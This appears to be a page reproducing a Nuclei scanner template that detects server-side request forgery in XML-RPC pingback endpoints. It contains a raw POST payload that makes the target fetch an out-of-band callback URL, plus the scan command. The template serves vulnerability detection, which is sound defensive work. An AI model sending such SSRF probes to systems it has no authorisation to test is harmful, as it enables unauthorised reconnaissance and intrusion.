XMLRPC Pingback SSRF

ID: xmlrpc-pingback-ssrf

Severity: high

Author: geeknik

Tags: xmlrpc,hackerone,ssrf,generic

Description

XMLRPC Pingback leads to SSRF.

YAML Source

id: xmlrpc-pingback-ssrf

info:
  name: XMLRPC Pingback SSRF
  author: geeknik
  severity: high
  description: XMLRPC Pingback leads to SSRF.
  reference:
    - https://hackerone.com/reports/406387
  metadata:
    max-request: 1
  tags: xmlrpc,hackerone,ssrf,generic

http:
  - raw:
      - |
        POST /xmlrpc/pingback HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

        <?xml version="1.0" encoding="UTF-8"?>
        <methodCall>
        <methodName>pingback.ping</methodName>
        <params>
        <param>
        <value>http://{{interactsh-url}}</value>
        </param>
        </params>
        </methodCall>

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 4b0a00483046022100b9c0df7388577f0b020d925d4faf1d98344d0fed6488b6d1500c5e703b0f54a0022100ce92f1150040cc336adbdbe2e31a4363e1973409b27ec81c125c172c155d2886:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml"

View on Github